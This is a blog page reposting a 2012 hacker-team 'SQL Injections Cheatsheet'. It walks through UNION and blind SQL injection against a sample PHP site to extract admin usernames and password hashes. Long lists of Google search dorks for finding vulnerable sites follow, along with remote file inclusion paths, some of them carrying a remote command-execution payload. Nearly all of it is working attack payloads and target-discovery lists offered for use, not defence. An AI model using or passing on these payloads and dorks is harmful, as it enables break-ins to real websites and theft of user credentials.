H-CRIME
Tổng hợp nghiên cứu về Tội phạm
Mình đã chuyển toàn bộ bài viết và xây dựng tên miền mới tại đây :
http://toiphammaytinh.com
Mong các bạn đón nhận
Thân !
http://toiphammaytinh.com
Mong các bạn đón nhận
Thân !
Wednesday, August 22, 2012
| |
0
comments
Read more
###################################################
# [+]Title: [Full SQL Injections Cheatsheet]
###################################################
# [+] About :
###################################################
# Author : GlaDiaT0R | the_gl4di4t0r@hotmail.com<mailto:the_gl4di4t0r@hotmail.com>
# Team : DarkGh0st Team ( DarkGh0st.Com )
# Greetz: Boomrang_Victim, Marwen_Neo
###################################################
# [+] Summary: I*
# [1]-Introducing The SQL Injection Vuln
# [2]-Exploiting Sql Injection Vuln
# [3]-Exploiting Blind SQL Injection Vuln
###################################################
[1]* -Introducing The SQL Injection Vuln:
.SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)
[2]* -Exploiting Sql Injection Vuln :
.Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple
http://www.website.com/articles.php?id=3
for checking the vulnerability we have to add ' (quote) to the url , lets see together
http://www.website.com/articles.php?id=3'
now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.
Now, Lets go to exploiting this vuln and finding some informations about this sql database
certainly before doing anything we have to find the number of columns
[-] Finding the number of columns:
for finding the number of columns we use ORDER BY to order result in the database
lets see that ,
http://www.website.com/articles.php?id=3 order by 1/*
and if we havn't any error we try to change the number
http://www.website.com/articles.php?id=3 order by 2/*
still no error,so we continu to change the number
http://www.website.com/articles.php?id=3 order by 3/*
no error to
http://www.website.com/articles.php?id=3 order by 4/*
no error
http://www.website.com/articles.php?id=3 order by 5/*
yeah , here we have this error (Unknown column '5' in 'order clause')
so, this database has 4 colmuns because the error is in the 5
now, we try to check that UNION function work or not
[-] Checking UNION function :
for using UNION function we select more informations from the database in one statment
so we try this
http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)
now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work
if it not work we try to change the /* to --
so we have this
http://www.website.com/articles.php?id=3 union all select 1,2,3,4--
after checking the UNION function and it works good we try to get SQL version
[-] Getting SQL Version :
now we have a number in the screen after checking the UNION
we say in example that this number is 3
so we replace 3 with @@version or version()
http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*
and now we have the version in the screen!
lets go now to get tables and columns names
[-] Getting tables and columns names :
here we have a job to do!!
if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)
lets see that the table admin exist!
http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*
and here we see the number 3 that we had in the screen
now, we knows that the table admin exists
here we had to check column names:
http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*
if we get an error we have to try another column name
and if it work we get username displayed on screen (example: admin,moderator,super moderator...)
after that we can check if column password exists
we have this
http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*
and oups! we see password on the screen in a hash or a text
now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...
http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*
this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)
[3]* -Exploiting Blind SQL Injection Vuln :
first we should check if website is vulnerable for example
http://www.website.com/articles.php?id=3
and to test the vulnerability we had to use
http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)
and now
http://www.website.com/articles.php?id=3 and 1=2
here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection
we have to check MySQL Version
[-] Getting MySQL Version :
we use substring in blind injection to get MySQL Version
http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4
we should replace the 4 with 5 if the version is 5
http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5
and now if the function select do not work we should use subselect and we should testing if it work
[-] Testing if subselect works :
http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)
and now we have to see if we have access to mysql.user
http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)
now, we can checking table and column names
[-] Checking table and column names :
http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1
if the page load normaly and no errors the table users exists
now we need column name
http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page load normaly and no errors the column password exists
now we have the table and the column , yeah, we can exploiting the vunlnerability now
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
the page load normaly and no errors,so we need to change the 80 for having an error
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90
no errors ! we continu
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
Yeah!! an error
the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'
to test the second character we change ,1,1 to ,2,1
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
the page load normaly
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
the page loads normally, higher !!!
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
error ! lower number
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
Error That we search!!
now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets
our tutorial draws to the close!
Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:PHPOpenChat exthp)
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:"EasyPHPCalendar" exthp)
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/shoutbox/expanded.php?conf=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/main.php?page=
/default.php?page=
/index.php?meio.php=
/index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=
/index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=
/index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=
/index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do=
/index2.php?x= | /index2.php?content= | /template.php?pagina= | /inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
index2.php?includes_dir=
forums/toplist.php?phpbb_root_path=
forum/toplist.php?phpbb_root_path=
admin/config_settings.tpl.php?include_path=
include/common.php?include_path=
event/index.php?page=
forum/index.php?includeFooter=
forums/index.php?includeFooter=
forum/bb_admin.php?includeFooter=
forums/bb_admin.php?includeFooter=
language/lang_english/lang_activity.php?phpbb_root_path=
forum/language/lang_english/lang_activity.php?phpbb_root_path=
blend_data/blend_common.php?phpbb_root_path=
master.php?root_path=
includes/kb_constants.php?module_root_path=
forum/includes/kb_constants.php?module_root_path=
forums/includes/kb_constants.php?module_root_path=
classes/adodbt/sql.php?classes_dir=
agenda.php3?rootagenda=
agenda2.php3?rootagenda=
sources/lostpw.php?CONFIG[path]=
topsites/sources/lostpw.php?CONFIG[path]=
toplist/sources/lostpw.php?CONFIG[path]=
sources/join.php?CONFIG[path]=
topsites/sources/join.php?CONFIG[path]=
toplist/sources/join.php?CONFIG[path]=
topsite/sources/join.php?CONFIG[path]=
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
extras/poll/poll.php?file_newsportal=
index.php?site_path=
mail/index.php?site_path=
fclick/show.php?path=
show.php?path=
calogic/reconfig.php?GLOBALS[CLPath]=
eshow.php?Config_rootdir=
auction/auction_common.php?phpbb_root_path=
index.php?inc_dir=
calendar/index.php?inc_dir=
modules/TotalCalendar/index.php?inc_dir=
modules/calendar/index.php?inc_dir=
calendar/embed/day.php?path=
ACalendar/embed/day.php?path=
calendar/add_event.php?inc_dir=
claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
claroline/auth/ldap/authldap.php?includePath=
docebo/modules/credits/help.php?lang=
modules/credits/help.php?lang=
config.php?returnpath=
editsite.php?returnpath=
in.php?returnpath=
addsite.php?returnpath=
includes/pafiledb_constants.php?module_root_path=
phpBB/includes/pafiledb_constants.php?module_root_path=
pafiledb/includes/pafiledb_constants.php?module_root_path=
auth/auth.php?phpbb_root_path=
auth/auth_phpbb/phpbb_root_path=
apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
phpdig/includes/config.php?relative_script_path=
includes/phpdig/includes/config.php?relative_script_path=
includes/dbal.php?eqdkp_root_path=
eqdkp/includes/dbal.php?eqdkp_root_path=
dkp/includes/dbal.php?eqdkp_root_path=
path/include/SQuery/gameSpy2.php?libpath=
include/global.php?GLOBALS[includeBit]=
topsites/config.php?returnpath=
manager/frontinc/prepend.php?_PX_config[manager_path]=
ubbthreads/addpost_newpoll.php?addpoll=thispath=
forum/addpost_newpoll.php?thispath=
forums/addpost_newpoll.php?thispath=
ubbthreads/ubbt.inc.php?thispath=
forums/ubbt.inc.php?thispath=
forum/ubbt.inc.php?thispath=
forum/admin/addentry.php?phpbb_root_path=
admin/addentry.php?phpbb_root_path=
index.php?f=
index.php?act=
ipchat.php?root_path=
includes/orderSuccess.inc.php?glob[rootDir]=
stats.php?dir[func]=dir[base]=
ladder/stats.php?dir[base]=
ladders/stats.php?dir[base]=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
vwar/admin/admin.php?vwar_root=
modules/vwar/admin/admin.php?vwar_root=
modules/vWar_Account/includes/get_header.php?vwar_root=
modules/vWar_Account/includes/functions_common.php?vwar_root2=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
impex/ImpExData.php?systempath=
forum/impex/ImpExData.php?systempath=
forums/impex/ImpExData.php?systempath=
application.php?base_path=
index.php?theme_path=
become_editor.php?theme_path=
add.php?theme_path=
bad_link.php?theme_path=
browse.php?theme_path=
detail.php?theme_path=
fav.php?theme_path=
get_rated.php?theme_path=
login.php?theme_path=
mailing_list.php?theme_path=
new.php?theme_path=
modify.php?theme_path=
pick.php?theme_path=
power_search.php?theme_path=
rating.php?theme_path=
register.php?theme_path=
review.php?theme_path=
rss.php?theme_path=
search.php?theme_path=
send_pwd.php?theme_path=
sendmail.php?theme_path=
tell_friend.php?theme_path=
top_rated.php?theme_path=
user_detail.php?theme_path=
user_search.php?theme_path=
invoice.php?base_path=
cgi-bin//classes/adodbt/sql.php?classes_dir=
cgi-bin/install/index.php?G_PATH=
cgi-bin/include/print_category.php?dir=
includes/class_template.php?quezza_root_path=
bazar/classified_right.php?language_dir=
classified_right.php?language_dir=
phpBazar/classified_right.php?language_dir=
chat/messagesL.php3?cmd=
phpMyChat/chat/messagesL.php3?cmd=
bbs/include/write.php?dir=
visitorupload.php?cmd=
modules/center/admin/accounts/process.php?module_path]=
index.php?template=
armygame.php?libpath=
lire.php?rub=
pathofhostadmin/?page=
apa_phpinclude.inc.php?apa_module_basedir=
index.php?req_path=
research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
Farsi1/index.php?archive=
index.php?archive=
show_archives.php?template=
forum/include/common.php?pun_root=
pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
vuln.php?=
cgi-bin//include/write.php?dir=
admin/common.inc.php?basepath=
pm/lib.inc.php?sfx=
pm/lib.inc.php?pm_path=
artmedic-kleinanzeigen-path/index.php?id=
index.php?pagina=
osticket/include/main.php?include_dir=
include/main.php?config[search_disp]=include_dir=
phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
quick_reply.php?phpbb_root_path=
zboard/include/write.php?dir=
PATH/admin/plog-admin-functions.php?configbasedir=
path_to_phpgreetz/content.php?content=
path_to_qnews/q-news.php?id=
_conf/core/common-tpl-vars.php?confdir=
votebox.php?VoteBoxPath=
al_initialize.php?alpath=
include/db.php?GLOBALS[rootdp]=
modules/news/archivednews.php?GLOBALS[language_home]=
protection.php?siteurl=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
index2.php?includes_dir=
classes.php?LOCAL_PATH=
extensions/moblog/moblog_lib.php?basedir=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
phpWebLog/include/init.inc.php?G_PATH=
admin/objects.inc.php4?Server=
trg_news30/trgnews/install/article.php?dir=
block.php?Include=
arpuivo.php?data=
path_to_gallery/setup/index.php?GALLERY_BASEDIR=
include/help.php?base=
index.php?[Home]=
path_to_script/block.php?Include=
examples/phonebook.php?page=
PHPNews/auth.php?path=
include/print_category.php?dir=
skin/zero_vote/login.php?dir=
skin/zero_vote/setup.php?dir=
skin/zero_vote/ask_password.php?dir=
gui/include/sql.php?include_path=
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=
email.php?login=cer_skin=
PhotoGal/ops/gals.php?news_file=
index.php?custom=
loginout.php?cutepath=
oneadmin/config.php?path[docroot]=
xcomic/initialize.php?xcomicRootPath=
skin/zero_vote/setup.php?dir=
skin/zero_vote/error.php? dir=
admin_modules/admin_module_captions.inc.php?config[path_src_include]=
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
admin_modules/admin_module_edit.inc.php?config[path_src_include]=
admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
src/index_overview.inc.php?config[path_src_include]=
src/index_leftnavbar.inc.php?config[path_src_include]=
src/index_image.inc.php?config[path_src_include]=
src/image-gd.class.php?config[path_src_include]=
src/image.class.php?config[path_src_include]=
src/album.class.php?config[path_src_include]=
src/show_random.inc.php?config[path_src_include]=
src/main.inc.php?config[path_src_include]=
src/index_passwd-admin.inc.php?config[path_admin_include]=
yappa-ng/src/index_overview.inc.php?config[path_src_include]=
admin_modules/admin_module_captions.inc.php?config[path_src_include]=
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
admin_modules/admin_module_edit.inc.php?config[path_src_include]=
admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
src/index_overview.inc.php?config[path_src_include]=
src/image-gd.class.php?config[path_src_include]=
src/image.class.php?config[image_module]=
src/album.class.php?config[path_src_include]=
src/show_random.inc.php?config[path_src_include]=
src/main.inc.php?config[path_src_include]=
includes/db_adodb.php?baseDir=
includes/db_connect.php?baseDir=
includes/session.php?baseDir=
modules/projects/gantt.php?dPconfig[root_dir]=
modules/projects/gantt2.php?dPconfig[root_dir]=
modules/projects/vw_files.php?dPconfig[root_dir]=
modules/admin/vw_usr_roles.php?baseDir=
modules/public/calendar.php?baseDir=
modules/public/date_format.php?baseDir=
modules/tasks/gantt.php?baseDir=
mantis/login_page.php?g_meta_include_file=
phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
modules/My_eGallery/public/displayCategory.php?basepath=
dotproject/modules/files/index_table.php?root_dir=
nukebrowser.php?filnavn=
bug_sponsorship_list_view_inc.php?t_core_path=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
modules/coppermine/themes/maze/theme.php?THEME_DIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
phpBB/admin/admin_styles.php?mode=
aMember/plugins/db/mysql/mysql.inc.php?config=
admin/lang.php?CMS_ADMIN_PAGE=
inc/pipe.php?HCL_path=
include/write.php?dir=
becommunity/community/index.php?pageurl=
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
modules/agendax/addevent.inc.php?agendax_path=
shoutbox/expanded.php?conf=
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
index.php?page=
index.php?pag=
index.php?include=
index.php?content=
index.php?cont=
index.php?c=
modules/My_eGallery/index.php?basepath=
modules/newbb_plus/class/forumpollrenderer.php?bbPath=
journal.php?m=
index.php?m=
links.php?c=
forums.php?m=
list.php?c=
user.php?xoops_redirect=
index.php?id=
r.php?url=
CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
inc/formmail.inc.php?script_root=
include/init.inc.php?G_PATH=
backend/addons/links/index.php?PATH=
modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
protection.php?siteurl=
htmltonuke.php?filnavn=
mail_autocheck.php?pm_path=
index.php?p=
modules/4nAlbum/public/displayCategory.php?basepath=
e107/e107_handlers/secure_img_render.php?p=
include/new-visitor.inc.php?lvc_include_dir=
path_of_cpcommerce/_functions.php?prefix=
community/modules/agendax/addevent.inc.php?agendax_path=
library/editor/editor.php?root=
library/lib.php?root=
zentrack/index.php?configFile=
pivot/modules/module_db.php?pivot_path=
main.php?x=
myPHPCalendar/admin.php?cal_dir=
index.php/main.php?x=
index.php?x=
index.php?open=
index.php?visualizar=
template.php?pagina=
index.php?inc=
includes/include_onde.php?include_file=
index.php?pg=
index.php?show=
index.php?cat=
print.php?val1=
cmd.php?function=
iframe.php?file=
os/pointer.php?url=
p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
index.php?file=
db.php?path_local=
phpGedView/individual.php?PGV_BASE_DIRECTORY=
index.php?kietu[url_hit]=
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
Sources/Packages.php?sourcedir=
yabbse/Sources/Packages.php?sourcedir=
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
cgi-bin//gadgets/Blog/BlogModel.php?path=
cgi-bin//admin.php?cal_dir=
gallery/captionator.php?GALLERY_BASEDIR=
cgi-bin/main.php?x=
Blog/BlogModel.php?path=
admin.php?cal_dir=
expanded.php?conf=
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
pollvote/pollvote.php?pollname=
displayCategory.php?basepath=
phpBB2/admin/admin_cash.php?phpbb_root_path=
modules/foro/includes/functions_admin.php?phpbb_root_path=
modules/Forums/admin/admin_forums.php?phpEx=
modules/Forums/admin/admin_disallow.php?phpEx=
modules/Forums/admin/admin_smilies.php?phpEx=
modules/Forums/admin/admin_board.php?phpEx=
modules/Forums/admin/admin_users.php?phpEx=
modules/Forums/admin/admin_mass_email.php?phpEx=
modules/Forums/admin/admin_forum_prune.php?phpEx=
modules/Forums/admin/admin_styles.php?phpbb_root_path=
index.php?hc=
mt-comments.cgi?id=
webcalendar/tools/send_reminders.php?includedir=
cmd/product_info.php/products_id/1622/shop_content.php?coID=
addevent.inc.php?agendax_path=
step_one.php?server_inc=
upgrade_album.php?GALLERY_BASEDIR=
search.php?cutepath=
modules.php?name=
wagora/extras//quicklist.php?site=
vCard/admin/define.inc.php?match=
forum/ubbthreads.php?Cat=
admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
secure.php?cfgProgDir=
modules/My_eGallery/public//inc/?HCL_path=
modules/My_eGallery/public/imagen.php?basepath=
adlayer.php?layerstyle=
Forums/bb_smilies.php?name=
modules/Forums/bb_smilies.php?name=
gadgets/Blog/BlogModel.php?path=
learnlinc/clmcpreload.php?CLPATH=
modernbill/samples/news.php?DIR=
religions/faq.php?page=
forum/viewtopic.php?t=
announcements.php?includePath=
inc/header.php/step_one.php?server_inc=
phpatm/index.php?include_location=
gb/form.inc.php3?lang=
shannen/index.php?x=
family/phpgedview/index.php?PGV_BASE_DIRECTORY=
main.php?left=
forum/misc.php?action=
nucleus/libs/globalfunctions.php?DIR_LIBS=
